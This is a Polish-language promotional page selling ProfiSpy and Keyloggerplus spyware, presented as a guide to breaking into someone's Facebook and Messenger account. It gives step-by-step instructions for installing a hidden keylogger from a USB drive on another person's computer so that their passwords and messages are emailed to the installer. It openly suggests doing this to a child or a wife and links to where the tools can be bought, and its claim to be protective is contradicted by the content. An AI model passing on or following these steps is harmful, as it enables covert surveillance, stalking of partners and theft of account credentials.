KUP TERAZ ProfiSpy »

Jak włamać się na fb i messengera?

Jak włamać się na Facebooka?

Czy zastanawiałeś się kiedyś jak włamać się na fb lub messengera?
System działania jest banalnie prosty — należy poznać hasło. Najłatwiejszym sposobem na “włamanie się” do Facebooka jest zresetowanie hasła.

Poniżej informacyjna instrukcja krok po kroku – pamiętaj, że niniejszy poradnik ma jedynie chronić i zabezpieczać przed podobnymi działaniami:

1. Musisz mieć fizyczny dostęp do komputera (tam gdzie jest logowanie na facebooka), by podpiąć pendrive (pamięć przenośną) z odpowiednim oprogramowaniem.
2. Kupujesz program typu keylogger, który co jakiś czas wysyła na podany adres e-mail wszystkie znaki wpisywane na klawiaturze.
3. Podłączasz pendrive z tym programem do danego komputera i podążasz według wskazanych przez niego instrukcji.
4. Regularnie sprawdzasz wiadomości na owej skrzynce szukając odpowiednich fraz, np. nazwę portalu społecznościowego, np. facebooka.
5. Otrzymujesz login i hasło, a także treść wiadomości — idealne, gdy nie wiemy co w sieci robi dziecko czy żona.

Z naszego doświadczenia najlepszy jest ProfiSpy lub tańszy Keyloggerplus — nie zwracają w ogóle uwagi użytkownika komputera i niezauważalnie przesyłają wszelkie logi na wskazany podczas instalacji e-mail. Programy te przesyłają takie dane jak uruchomione programy oraz treść wiadomości z dokładną datą i godziną.

Profispy kupisz tutaj: https://programszpiegujacy.pl/pobierz-program-szpiegujacy

Keyloggerplusa kupisz tutaj: https://programszpiegujacy.pl/plus

Teraz już wiesz jak włamać się na messengera i facebooka. 🙂